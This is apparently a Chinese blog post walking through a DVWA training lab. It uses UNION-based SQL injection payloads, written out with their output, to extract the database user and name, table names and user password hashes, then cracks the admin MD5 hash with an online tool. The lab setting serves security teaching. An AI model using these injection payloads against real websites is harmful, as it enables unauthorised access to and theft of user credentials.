本文介绍了通过DVWA(Damn Vulnerable Web Application)获取数据库信息的过程,包括使用SQL注入获取数据库名称、用户、表名和列名。通过注入语句如`1'union select user(), database()#`和`1' UNION SELECT 1, table_name FROM information_schema.tables WHERE table_schema='dvwa' #`等,揭示了数据库的敏感信息。作者还展示了如何利用注入获取用户密码,并使用在线工具解密得到明文密码。整个过程为读者提供了SQL注入攻击的实际示例。
第1关:获取dvwa环境
下载dvwa的时候其实已经通过了,但建议全部做一下,后面的要用
git clone GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA)
第2关:获取数据库名称、账户名、版本及操作系统信息
注入的sql:
1' union select user(),database()#使用sql注入查询数据库用户名和数据库名,并将用户名和数据库名写入/data/workspace/myshixun/result2中:
root@localhost dvwa第3关:获取数据库表名、列名
注入的sql语句:
1' UNION SELECT 1,table_name from information_schema.tables where table_schema='dvwa'#使用sql注入查询dvwa数据库的所有表名,并将所有表明写入/data/workspace/myshixun/result3中:
guestbook users第4关:获取用户名密码,并猜测root用户
注入的sql语句:
1' union select user,password from users#在出现的下列表中找到admin
找到
5f4dcc3b5aa765d61d8327deb882cf99在进行解密,我推荐一个解密的在线网站https://md5.cn/
解密成功的
password
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
